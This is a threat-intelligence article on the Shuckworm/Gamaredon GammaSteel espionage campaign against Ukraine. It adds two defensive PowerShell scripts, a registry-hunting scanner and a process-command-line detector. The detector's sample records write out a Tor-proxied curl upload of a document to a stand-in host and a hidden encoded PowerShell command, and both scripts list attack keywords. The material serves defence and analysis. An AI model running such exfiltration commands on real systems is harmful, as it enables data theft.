Introduction:
In a new and increasingly sophisticated cyber espionage campaign, the Russian-affiliated hacking group Shuckworm—also known by aliases such as Gamaredon or Armageddon—has intensified its digital offensive against Ukrainian institutions. Between February and March 2025, cybersecurity experts detected a wave of attacks driven by a newly enhanced variant of the group’s notorious GammaSteel malware. This operation reflects the group’s evolution in cyber tactics, emphasizing stealth, persistence, and advanced data exfiltration capabilities.
The campaign reveals a notable shift in strategy, particularly the group’s reliance on PowerShell-based scripts and registry-stored payloads. These techniques are specifically crafted to bypass traditional detection systems while leveraging legitimate platforms such as Telegram and Cloudflare for concealment and control. Below, we dissect the components of this ongoing cyber campaign and what makes it particularly dangerous in today’s conflict-driven digital world.
Campaign Overview:
- The Shuckworm group launched its latest cyberattack campaign on February 26, 2025.
- Initial infection began via an infected removable drive, signaling a targeted and manual approach.
- Malicious activity initiated with a crafted LNK file that created a Windows Registry value under the UserAssist key.
- Obfuscated VBScript and PowerShell payloads were stored in the registry, making them harder to detect.
- Two critical registry files were involved:
  - NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms: Maintained contact with C&C servers using platforms like Telegram and Cloudflare.
  - NTUSER.DAT.TMContainer00000000000000000002.regtrans-ms: Altered registry settings, hid files, and propagated the malware using malicious shortcuts.
- The malware used Cloudflare tunnels and decentralized services (like write.as, telegra.ph) for communication, complicating traceability.
- GammaSteel, now primarily a PowerShell-based malware, shows enhanced reconnaissance features:
  - It collects screenshots, lists running processes, and extracts disk and antivirus data.
  - It filters specific file types such as DOC, XLS, PDF while avoiding typical system files.
- Exfiltration tactics have improved significantly:
  - Uses PowerShell or cURL via Tor proxies for stealth.
  - MD5 hashes of stolen files are created using certutil.exe to ensure data integrity.
- Malware achieves persistence by registering itself in the Windows Run key.
- Shuckworm employs modular payloads, split across registry values, making analysis and reverse engineering harder.
- In several cases, the malware pulled additional payloads using PowerShell commands, enhancing its capabilities.
- Experts recommend proactive measures, especially in Ukraine:
  - Monitor registry activities closely.
  - Disable use of removable drives in sensitive environments.
  - Deploy endpoint protection solutions like Symantec and monitor IOCs linked to the group.
- The overall campaign underscores a growing and alarming trend of geopolitical cyber warfare in Eastern Europe.
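As an added example (this is not code from the article, from cyberpress.org or from the Symantec research it summarizes), the PowerShell hunting script below covers the two registry locations the overview names: the Run/RunOnce keys used for persistence and the UserAssist tree the crafted LNK wrote to. It flags values that look like a stored script payload rather than a normal autorun command line. The keyword list, the base64 heuristic and the size threshold are my own assumptions, not indicators published for this campaign; run it in an elevated PowerShell session on a suspect host.

```powershell
# Added hunting script (not from the article or from Symantec/cyberpress.org).
# Scans the autorun keys and the UserAssist tree for values that look like stored
# script payloads. Keyword list, base64 heuristic and size threshold are assumptions.

$AutorunKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)
$UserAssistKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist'

# Substrings that commonly appear when a registry value launches or carries script
# (script hosts, encoded-command switches, in-memory execution helpers).
$SuspectPattern = 'powershell|pwsh|wscript|cscript|mshta|rundll32|-e(c|nc|ncodedcommand)?\b|frombase64string|\biex\b|invoke-expression|-w\s+hidden|windowstyle\s+hidden|-ep\s+bypass|executionpolicy\s+bypass'

function ConvertTo-ValueText {
    param($Data)
    # REG_BINARY values arrive as byte[]; decode as ASCII so embedded script text is searchable.
    if ($Data -is [byte[]]) { return [System.Text.Encoding]::ASCII.GetString($Data) }
    return [string]$Data
}

function Test-SuspiciousValue {
    param([string]$Text)
    $reasons = @()
    if ($Text -match $SuspectPattern) { $reasons += 'script-launch keyword' }
    # A long unbroken run of base64 alphabet is typical of an encoded payload blob.
    if ($Text -match '[A-Za-z0-9+/]{200,}={0,2}') { $reasons += 'base64-like blob' }
    # Autorun values are normally a short command line; kilobytes of data is unusual.
    if ($Text.Length -gt 1024) { $reasons += "oversized value ($($Text.Length) chars)" }
    return $reasons
}

function Get-RegistryFindings {
    param([string[]]$Keys)
    foreach ($key in $Keys) {
        if (-not (Test-Path -Path $key -ErrorAction SilentlyContinue)) { continue }
        $item = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if (-not $item) { continue }
        foreach ($prop in $item.PSObject.Properties) {
            if ($prop.Name -like 'PS*') { continue }   # provider metadata (PSPath, PSDrive, ...)
            $text    = ConvertTo-ValueText $prop.Value
            $reasons = Test-SuspiciousValue -Text $text
            if ($reasons) {
                [pscustomobject]@{
                    Key     = $key
                    Value   = $prop.Name
                    Reasons = ($reasons -join '; ')
                    Preview = $text.Substring(0, [Math]::Min(80, $text.Length))
                }
            }
        }
    }
}

# UserAssist holds GUID-named subkeys, each with a Count subkey; scan the whole tree.
$UserAssistSubkeys = @()
if (Test-Path -Path $UserAssistKey -ErrorAction SilentlyContinue) {
    $UserAssistSubkeys = Get-ChildItem -Path $UserAssistKey -Recurse | ForEach-Object { $_.PSPath }
}

$findings = Get-RegistryFindings -Keys ($AutorunKeys + $UserAssistSubkeys)
if ($findings) { $findings | Format-Table -AutoSize -Wrap }
else { 'No suspicious autorun or UserAssist values found.' }
```

A one-off scan like this only finds what is already in place; for continuous coverage of the same locations, Sysmon Event ID 13 (registry value set) filtered to the Run, RunOnce and UserAssist paths records each write as it happens, and the same keyword and size heuristics can be applied to the event's Details field.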
What Undercode Says:
The Shuckworm campaign offers more than just another example of cyber espionage—it highlights a new tier of persistent threat operations that blur the lines between nation-state tactics and hacker innovations.
At the core of this attack is a hybridized methodology: combining old-school tactics like infected removable drives with modern-day obfuscation and legitimate platforms as communication backbones. By using Telegram, Teletype, and Cloudflare Tunnels, the attackers not only enhance their stealth but actively complicate the forensic trail, making it harder for defenders to trace and block.
GammaSteel’s evolution into a PowerShell-centric malware is a logical yet dangerous move. PowerShell, being a legitimate system tool, often flies under the radar of many detection systems. By embedding scripts directly into registry keys, the attackers bypass disk-based scanning tools entirely. This technique isn’t just clever—it’s a sign of the increasing professionalization and funding behind such state-sponsored actors.
The use of modular registry payloads—spreading malicious functions across various entries—makes reverse engineering a nightmare. It slows down incident response and analysis, giving the attackers more time to operate undetected. Furthermore, exfiltration via Tor and the use of file hashes before extraction suggest the attackers are aiming for high-value, authentic data, not just mass surveillance.
What’s more alarming is the infrastructure being used. Services like write.as and telegra.ph, known for privacy-focused publishing, are being weaponized to serve C&C purposes. This mirrors a growing tactic where legitimate, even “trusted,” platforms are hijacked for malicious use—blurring the line between safe and unsafe web destinations.
The persistence mechanism, registering malware in the Windows Run key, is old-school but effective. It guarantees the malware revives even after reboots, ensuring long-term access to compromised systems.
From a defense standpoint, organizations in high-risk regions, especially Ukraine, need to pivot from reactive to proactive. Relying solely on antivirus tools is no longer sufficient. Modern cyber defense requires behavioral analysis, memory-level monitoring, and threat hunting teams trained to deal with registry-based threats and PowerShell attacks.
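To make the behavioral-analysis point concrete, here is an added example (not from the article, cyberpress.org or Symantec) of a small PowerShell rule set applied to process-creation records of the kind Sysmon Event ID 1 or Windows Security event 4688 produces. The rules cover the behaviours the overview describes: certutil hashing of files, cURL or PowerShell routed through a local proxy, encoded and hidden-window PowerShell, and PowerShell pulling further payloads from the web. The five sample records, the regexes and the `upload-host.invalid` destination are constructed for the demonstration and are not indicators from the campaign.

```powershell
# Added detection example (not from the article or from Symantec). Applies behavioral
# rules to process-creation records. Sample records and regexes are constructed.

$Rules = @(
    @{ Name = 'certutil file hashing';    Pattern = 'certutil(\.exe)?\s+.*-hashfile' }
    @{ Name = 'cURL through local proxy'; Pattern = 'curl(\.exe)?\s+.*(--socks5(-hostname)?|--proxy|-x)\s+(socks5h?://)?(127\.0\.0\.1|localhost)' }
    @{ Name = 'encoded PowerShell';       Pattern = 'powershell(\.exe)?\s+.*-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}' }
    @{ Name = 'PowerShell web download';  Pattern = 'powershell(\.exe)?.*(downloadstring|downloadfile|invoke-webrequest|iwr\s|net\.webclient)' }
    @{ Name = 'hidden-window PowerShell'; Pattern = 'powershell(\.exe)?\s+.*-w(indowstyle)?\s+hidden' }
)

function Find-SuspiciousProcesses {
    param([object[]]$Events)   # each record needs Time, ParentImage and CommandLine
    foreach ($ev in $Events) {
        # -match is case-insensitive by default, which suits command-line matching.
        $hits = foreach ($r in $Rules) {
            if ($ev.CommandLine -match $r.Pattern) { $r.Name }
        }
        if ($hits) {
            [pscustomobject]@{
                Time        = $ev.Time
                ParentImage = $ev.ParentImage
                Rules       = ($hits -join ', ')
                CommandLine = $ev.CommandLine
            }
        }
    }
}

# Constructed sample records: two benign, three matching the described tradecraft.
# The base64 blob is a dummy (it decodes to a run of 'A' characters).
$SampleEvents = @(
    @{ Time = '2025-03-01T09:12:03'; ParentImage = 'C:\Windows\explorer.exe'
       CommandLine = '"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\u\Documents\report.docx"' }
    @{ Time = '2025-03-01T09:13:40'; ParentImage = 'C:\Windows\System32\wscript.exe'
       CommandLine = 'powershell.exe -w hidden -nop -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB' }
    @{ Time = '2025-03-01T09:14:02'; ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       CommandLine = 'certutil.exe -hashfile C:\Users\u\Documents\report.docx MD5' }
    @{ Time = '2025-03-01T09:14:30'; ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       CommandLine = 'curl.exe --socks5-hostname 127.0.0.1:9050 -T C:\Users\u\Documents\report.docx http://upload-host.invalid/' }
    @{ Time = '2025-03-01T09:15:11'; ParentImage = 'C:\Windows\explorer.exe'
       CommandLine = '"C:\Program Files\Mozilla Firefox\firefox.exe"' }
)

# Expected: records 2 (encoded + hidden-window), 3 (certutil) and 4 (cURL proxy) are reported.
Find-SuspiciousProcesses -Events $SampleEvents | Format-Table -AutoSize -Wrap
```

Against real telemetry, build the record list from `Get-WinEvent` on the Sysmon Operational log (Event ID 1) or the Security log (event 4688) and map the CommandLine and ParentImage fields; the parent process is worth keeping, since script hosts such as wscript.exe or powershell.exe spawning certutil or curl is a stronger signal than either command line alone. The same five rules translate directly into Sigma or EDR query syntax.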
In the grand scheme, Shuckworm’s campaign is a microcosm of broader geopolitical cyber conflict. It’s not just about stealing documents—it’s about destabilizing systems, sowing mistrust, and asserting dominance in the information war.
Fact Checker Results:
- Multiple cybersecurity firms have confirmed Shuckworm’s involvement and the February–March 2025 timeline.
- GammaSteel’s PowerShell variant and registry-based techniques are consistent with previously documented TTPs by Gamaredon.
- Use of platforms like Telegram and Cloudflare as C&C channels is verified by open-source threat intelligence.
References:
Reported By: cyberpress.org